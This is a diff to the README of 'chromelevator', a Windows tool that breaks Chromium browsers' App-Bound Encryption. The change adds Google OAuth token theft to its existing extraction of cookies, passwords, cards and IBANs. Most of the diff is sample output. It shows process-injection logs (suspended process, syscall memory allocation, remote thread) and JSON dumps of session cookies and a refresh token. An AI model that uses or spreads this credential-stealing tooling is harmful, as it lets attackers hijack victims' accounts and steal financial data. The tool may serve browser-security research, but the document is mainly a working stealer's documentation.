@@ -31,7 +31,7 @@ This tool's effectiveness is rooted in a combination of modern, evasion-focused
3131
3232### Core Functionality
3333
34- - 🔓 Full user-mode decryption of cookies, passwords, payment methods, and IBANs .
34+ - 🔓 Full user-mode decryption of cookies, passwords, payment methods, IBANs, and Google OAuth tokens .
3535- 📁 Discovers and processes all user profiles (Default, Profile 1, etc.).
3636- 📝 Exports all extracted data into structured JSON files, organized by profile.
3737- 🔍 Comprehensive browser fingerprinting with system information.
@@ -76,7 +76,8 @@ This matrix outlines the extraction capabilities for each supported browser.
7676| ** Cookies** | ✅ ABE | ✅ ABE | ✅ ABE |
7777| ** Passwords** | ✅ ABE | ✅ ABE | ✅ ABE |
7878| ** Payment Methods** | ✅ ABE | ✅ ABE | ✅ ABE |
79- | ** IBANs** | ✅ ABE | ✅ ABE | ❌ Not existing |
79+ | ** IBANs** | ✅ ABE | ✅ ABE | ❌ N/A |
80+ | ** Auth Tokens** | ✅ Google | ❌ N/A | ❌ N/A |
8081
8182** Encryption Method Notes:**
8283- ** ABE (App-Bound Encryption):** Using AES-256-GCM with browser-specific master keys decrypted via COM interfaces.
@@ -153,7 +154,7 @@ _________ .__ ___________.__ __
153154 \_ _____ /___| /__| \_ ___/| __| _| /_______ /| ____/\_ __ > \_ / (____ /__| \_ ___/| __|
154155 \/ \/ \/ \/ \/ \/
155156 Direct Syscall-Based Reflective Hollowing
156- x64 & ARM64 | v0.17.0 by @xaitax
157+ x64 & ARM64 | v0.17.1 by @xaitax
157158
158159 Usage: chromelevator.exe [options] < chrome| edge| brave| all>
159160
@@ -184,27 +185,28 @@ _________ .__ ___________.__ __
184185
185186` ` ` bash
186187PS> .\c hromelevator.exe all
188+
187189_________ .__ ___________.__ __
188190\_ ___ \| | _________ ____ _____ \_ _____/| | _______ _______ _/ | _ ___________
189191/ \ \/ | | \_ __ \/ _ \ / \ | __)_ | | _/ __ \ \/ /\_ _ \\ __\/ _ \_ __ \
190192\ \_ __| Y \ | \( < _> ) Y Y \| \| | _\ ___/\ / / __ \| | ( < _> ) | \/
191193 \_ _____ /___| /__| \_ ___/| __| _| /_______ /| ____/\_ __ > \_ / (____ /__| \_ ___/| __|
192194 \/ \/ \/ \/ \/ \/
193195 Direct Syscall-Based Reflective Hollowing
194- x64 & ARM64 | v0.17.0 by @xaitax
196+ x64 & ARM64 | v0.17.1 by @xaitax
195197
196198 ┌──── Brave ──────────────────────────────────────
197199 │
198200 │ Decryption Key
199201 │ 2522A3C1730EA8EE84BAAD1994DB31E20437D9DCF27628997598BB5B86F73DCD
200202 │
201203 ├── Default
202- │ Cookies 2446/2467
204+ │ Cookies 2439/2460
203205 │ Passwords 46
204206 │ Cards 1
205207 │ IBANs 1
206208 │
207- └── 2446 cookies, 46 passwords, 1 cards, 1 IBANs (1 profile)
209+ └── 2439 cookies, 46 passwords, 1 cards, 1 IBANs (1 profile)
208210 C:\U sers\a h\D ocuments\G itHub\C hrome-App-Bound-Encryption-Decryption\o utput\B rave
209211
210212 ┌──── Chrome ──────────────────────────────────────
@@ -217,12 +219,13 @@ _________ .__ ___________.__ __
217219 │ Passwords 1
218220 │
219221 ├── Profile 1
220- │ Cookies 768/773
221- │ Passwords 2
222+ │ Cookies 815/820
223+ │ Passwords 789
222224 │ Cards 1
223225 │ IBANs 1
226+ │ Tokens 1
224227 │
225- └── 1146 cookies, 3 passwords, 1 cards, 1 IBANs (2 profiles)
228+ └── 1193 cookies, 790 passwords, 1 cards, 1 IBANs, 1 tokens (2 profiles)
226229 C:\U sers\a h\D ocuments\G itHub\C hrome-App-Bound-Encryption-Decryption\o utput\C hrome
227230
228231 ┌──── Edge ──────────────────────────────────────
@@ -231,14 +234,14 @@ _________ .__ ___________.__ __
231234 │ B0334FAD7F5805362CB4C44B144A95AB7A68F7346EF99EB3F175F09DB08C8FD9
232235 │
233236 ├── Default
234- │ Cookies 220/222
237+ │ Cookies 214/216
235238 │ Passwords 2
236239 │ Cards 1
237240 │
238241 ├── Profile 1
239- │ Cookies 42
242+ │ Cookies 25
240243 │
241- └── 262 cookies, 2 passwords, 1 cards (2 profiles)
244+ └── 239 cookies, 2 passwords, 1 cards (2 profiles)
242245 C:\U sers\a h\D ocuments\G itHub\C hrome-App-Bound-Encryption-Decryption\o utput\E dge
243246` ` `
244247
@@ -254,23 +257,23 @@ _________ .__ ___________.__ __
254257 \_ _____ /___| /__| \_ ___/| __| _| /_______ /| ____/\_ __ > \_ / (____ /__| \_ ___/| __|
255258 \/ \/ \/ \/ \/ \/
256259 Direct Syscall-Based Reflective Hollowing
257- x64 & ARM64 | v0.17.0 by @xaitax
260+ x64 & ARM64 | v0.17.1 by @xaitax
258261
259262 ┌──── Chrome ──────────────────────────────────────
260263 │ Terminating browser network services...
261264 │ [+] Network services terminated
262265 │ Creating suspended process: C:\P rogram Files\G oogle\C hrome\A pplication\c hrome.exe
263- │ [+] Process created (PID: 25184 )
264- │ [+] IPC pipe established: \\ .\p ipe\c hrome.nacl.20027_76C4
266+ │ [+] Process created (PID: 13020 )
267+ │ [+] IPC pipe established: \\ .\p ipe\c hrome.sync.26370.18285.8B20
265268 │ Deriving runtime decryption keys...
266- │ [+] Payload decrypted (1044 KB)
267- │ [+] Bootstrap entry point resolved (offset: 0x2a690 )
269+ │ [+] Payload decrypted (1048 KB)
270+ │ [+] Bootstrap entry point resolved (offset: 0x2a790 )
268271 │ Allocating memory in target process via syscall...
269- │ [+] Memory allocated at 0x1c2dec60000 (1048 KB)
272+ │ [+] Memory allocated at 0x2245a600000 (1052 KB)
270273 │ [+] Payload + parameters written
271274 │ [+] Memory protection set to PAGE_EXECUTE_READ
272275 │ Creating remote thread via syscall...
273- │ [+] Thread created (entry: 0x1c2dec8a690 )
276+ │ [+] Thread created (entry: 0x2245a62a790 )
274277 │ Awaiting payload connection...
275278 │ [+] Payload connected
276279 │ Running in Chrome
@@ -284,15 +287,16 @@ _________ .__ ___________.__ __
284287 │ Passwords 1
285288 │
286289 ├── Profile 1
287- │ Size 610 MB
288- │ Cookies 768/773
289- │ Passwords 2
290+ │ Size 739 MB
291+ │ Cookies 815/820
292+ │ Passwords 789
290293 │ Cards 1
291294 │ IBANs 1
295+ │ Tokens 1
292296 │ Extracting comprehensive fingerprint...
293297 │ Fingerprint saved to fingerprint.json
294298 │
295- └── 1146 cookies, 3 passwords, 1 cards, 1 IBANs (2 profiles)
299+ └── 1193 cookies, 790 passwords, 1 cards, 1 IBANs, 1 tokens (2 profiles)
296300 C:\U sers\a h\D ocuments\G itHub\C hrome-App-Bound-Encryption-Decryption\o utput\C hrome
297301` ` `
298302
@@ -319,11 +323,15 @@ Each cookie file is a JSON array of objects:
319323 {
320324 " host" : " accounts.google.com" ,
321325 " name" : " ACCOUNT_CHOOSER" ,
326+ " path" : " /" ,
327+ " expires" : 1766591611,
322328 " value" : " AFx_qI781-…"
323329 },
324330 {
325331 " host" : " mail.google.com" ,
326332 " name" : " OSID" ,
333+ " path" : " /mail" ,
334+ " expires" : 1766591611,
327335 " value" : " g.a000uwj5ufIS…"
328336 },
329337 …
@@ -375,7 +383,21 @@ Each IBAN file is a JSON array of objects:
375383]
376384` ` `
377385
378- # ## 🔍 Browser Fingerprinting
386+ # ## 🎟️ Token Extraction
387+
388+ Each token file is a JSON array of objects containing the service, the decrypted token, and the binding key (if present):
389+
390+ ` ` ` json
391+ [
392+ {
393+ " service" : " AccountId-112823413702122221871" ,
394+ " token" : " 1//03VJGN_vL2FR5CgYIARAAGAMSNwF-L9IrtiyH_tmtOneETFya5GEGiewlEMrLwDMuOl56zRoShNE77DfyOXhofn5Ryo_..." ,
395+ " binding_key" : " "
396+ }
397+ ]
398+ ` ` `
399+
400+ # ## 🔍 Browser Fingerprinting
379401
380402When using the ` --fingerprint` or ` -f` flag, a comprehensive metadata report is generated:
381403
0 commit comments